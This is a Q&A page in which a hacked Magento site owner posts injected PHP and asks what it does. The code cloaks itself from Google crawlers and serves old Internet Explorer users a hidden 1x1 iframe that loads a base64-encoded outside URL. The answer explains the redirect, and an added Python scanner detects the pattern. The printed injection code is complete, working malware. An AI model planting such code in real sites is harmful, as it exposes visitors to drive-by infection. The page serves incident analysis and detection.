PHP Web Application (Magento) hacked; What does this hacker code do?


Problem description

I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?

Also, how to stop this and how to spot the vulnerability?

Thanks

function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}


$ip=$_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];


$user_agent = $_SERVER["HTTP_USER_AGENT"];

$IP = $_SERVER['REMOTE_ADDR'].".log";

@mkdir('/tmp/Location/');

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if(!file_exists("/tmp/Location/{$IP}"))
{


if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)

{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
    preg_match("/MSIE 7.0/", $user_agent) OR
    preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';

touch ("/tmp/Location/{$IP}");

}}}}

Recommended answer

It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.
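
One way to hunt for the same pattern across a web root, as an added example that is not part of the original question or answer: it flags PHP source where a base64 literal decodes to a URL and the file also emits a 0- or 1-pixel iframe. The function names, the sample strings and the example.invalid host are constructed for illustration.

```python
import base64
import binascii
import re

# base64_decode('<literal>') or base64_decode("<literal>") in PHP source
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=]{8,})\1\s*\)""")
# Markup like the posted snippet emits: an iframe sized 0 or 1 pixel
HIDDEN_IFRAME = re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)
URL_PREFIXES = (b"http://", b"https://", b"//")


def decode_url_literals(source):
    """Return (line_number, decoded_url) for base64 literals that decode to a URL."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in B64_CALL.finditer(line):
            try:
                decoded = base64.b64decode(match.group(2), validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64, so not this pattern
            if decoded.lower().startswith(URL_PREFIXES):
                hits.append((lineno, decoded.decode("ascii", "replace")))
    return hits


def scan_php(source):
    """Summarise the two indicators for one PHP file's text."""
    urls = decode_url_literals(source)
    iframe = bool(HIDDEN_IFRAME.search(source))
    return {"encoded_urls": urls, "hidden_iframe": iframe,
            "suspicious": bool(urls) and iframe}


# Constructed samples (not taken from the page)
_ENC = base64.b64encode(b"http://example.invalid/index.php").decode()
SAMPLE_INFECTED = ("<?php\n$u=base64_decode('" + _ENC + "');\n"
                   "echo '<iframe frameborder=0 src=\"'.$u.'\" width=1 height=1></iframe>';\n")
SAMPLE_CLEAN = ("<?php\n$img = base64_decode('iVBORw0KGgoAAAANSUhEUg==');\n"
                "echo '<iframe width=560 height=315></iframe>';\n")

if __name__ == "__main__":
    import pathlib
    import sys
    for root in sys.argv[1:]:  # directories to walk, e.g. the site's document root
        for path in pathlib.Path(root).rglob("*.php"):
            result = scan_php(path.read_text(errors="replace"))
            if result["suspicious"]:
                print(path, result["encoded_urls"])
```

A hit is a lead for manual review, not proof of compromise; comparing flagged files against a clean copy of the same application release confirms whether the code was injected.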
